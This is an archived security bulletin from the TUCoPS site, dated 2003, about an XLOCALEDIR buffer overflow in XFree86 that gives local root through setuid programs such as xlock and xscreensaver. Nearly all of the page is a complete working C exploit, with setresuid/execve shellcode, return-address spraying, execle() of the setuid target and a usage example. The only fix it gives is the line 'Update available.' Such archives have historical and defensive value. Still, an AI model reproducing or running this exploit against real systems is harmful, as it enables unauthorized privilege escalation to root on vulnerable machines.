Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps N-Z :: lnx6047.htm

xscreensaver local buffer overflow via XLOCALEDIR var



8th Mar 2003 [SBWID-6047]
COMMAND

	xscreensaver local buffer overflow via XLOCALEDIR var

SYSTEMS AFFECTED

	 - Slackware 8.1 ( xlock, xscreensaver, xterm)
	 - Redhat 7.3 ( manual +s to xlock )
	 - Suse 8.1 ( manual +s to xlock )

PROBLEM

	
	+-------------------------------------------------------------------+
	| Agazzini Maurizio                                                 |
	| Security Analyst                                                  |
	| @ Mediaservice.net S.R.L.          D.S.D. Data Security Division  |
	|                                                                   |
	| PGP Key   : http://www.wayreth.eu.org/Inode.asc                   |
	| Disclaimer: http://@Mediaservice.net/disclaimer                   |
	+-------------------------------------------------------------------+
	
	/*
	
		Original exploit:
			** oC-localX.c - XFree86 Version 4.2.x local root exploit
			** By dcryptr && tarranta / oC
	
		This exploit is a modified version of the original oC-localX.c
		built to work without any offset. 
	
		Some distro have the file: /usr/X11R6/bin/dga +s
		This program isn't exploitable because it drops privileges
		before running the Xlib function vulnerable to this overflow.
	
		This exploit works on linux x86 on all distro. 
	
		Tested on:	
			- Slackware 8.1 ( xlock, xscreensaver, xterm)
			- Redhat 7.3 ( manual +s to xlock )
			- Suse 8.1 ( manual +s to xlock )
	
		by Inode <inode@mediaservice.net>
	
	*/
	
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <unistd.h>
	
	static char shellcode[] = 
	
	        /* setresuid(0,0,0); */
	 	"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80"
	        /* /bin/sh execve(); */
	        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
	        "\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
	        /* exit(0); */
	        "\x31\xdb\x89\xd8\xb0\x01\xcd\x80";
	
	
	#define ALIGN 0 
	
	int main(int argc, char **argv)
	{
		char 	buffer[6000];
		int i;
		int ret;
		char *env[3] = {buffer,shellcode,  NULL}; 
	
		int *ap;
	
		strcpy(buffer, "XLOCALEDIR=");
	
		printf("\nXFree86 4.2.x Exploit modified by Inode <inode@mediaservice.net>\n\n");
		if( argc != 3 )
		{
			printf(" Usage: %s <full path> <name>\n",argv[0]);
			printf("\n Example: %s /usr/X11R6/bin/xlock xlock\n\n",argv[0]);
			return 1;
		}
	
		ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]) ;
	
		ap = (int *)( buffer + ALIGN + strlen(buffer) );
	
		for (i = 0; i < sizeof(buffer); i += 4)
			*ap++ = ret;
		
		execle(argv[1], argv[2], NULL, env);
	
		return(0);
	}
	

SOLUTION

	Update available.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH